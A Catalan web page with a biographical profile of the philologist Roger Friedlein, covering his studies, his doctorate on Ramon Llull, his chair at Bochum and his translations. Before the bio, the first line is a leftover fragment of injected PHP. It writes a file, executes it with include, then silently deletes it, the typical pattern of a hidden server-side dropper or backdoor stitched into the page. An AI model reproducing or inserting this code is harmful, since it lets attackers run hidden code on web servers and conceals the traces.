");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Roger Friedlein
Facebook Twitter

Roger Friedlein

Visat núm. 13
(abril 2012)
por Corinna Albert
Roger Friedlein (Frankfurt, 1967) investiga en les àrees de la literatura consolatòria medieval i moderna, els processos de constitució del saber en l’èpica renaixentista i en la innovació literària entre Romanticisme i Modernisme a Espanya, a Hispanoamèrica i al Brasil.

Va estudiar filologia romànica (espanyol, francès) i filologia àrab a les universitats de Frankfurt, Barcelona (1990 i 1992), i a la Freie Universität de Berlín (llicenciatura el 1994). Estades d’estudis més breus al Brasil i a Portugal, a Espanya, Romania i Síria. Primera especialització en els estudis medievals, concretament en la literatura catalana de l’edat mitjana

Lector de català a la Martin-Luther-Universität de Halle-Wittenberg (1995-98). Doctorat amb una beca de la Fundació d’Estudis Alemanya (Deutsche Studienstiftung) amb una tesi sobre el diàleg literari en Ramon Llull (2001, traducció catalana publicada el 2011). De 1999 a 2009 fou professor assistent a l’Institut de Filologia Romànica i en la xarxa d’investigació «Cultures de la Performativitat» de la Freie Universität Berlin. Habilitació de càtedra amb un treball sobre l’escenificació de la cosmografia a la literatura èpica renaixentista a França, Espanya i Portugal (2009). Des de 2009, és professor catedràtic de filologia romànica i especialment de literatures i cultures iberoromàniques, a la Ruhr-Universität Bochum.

Traduccions literàries del català a l’alemany; coeditor de la Zeitschrift für Katalanistik / Revista d’Estudis Catalans (des de 2006). Editor de diversos llibres, entre els quals Vestigia fabularum. La mitologia antiga a les literatures catalana i castellana (2004), i una antologia de literatura catalana contemporània, traduïda a l’alemany (Die Spezialität des Hauses, 1998).

Con el soporte de: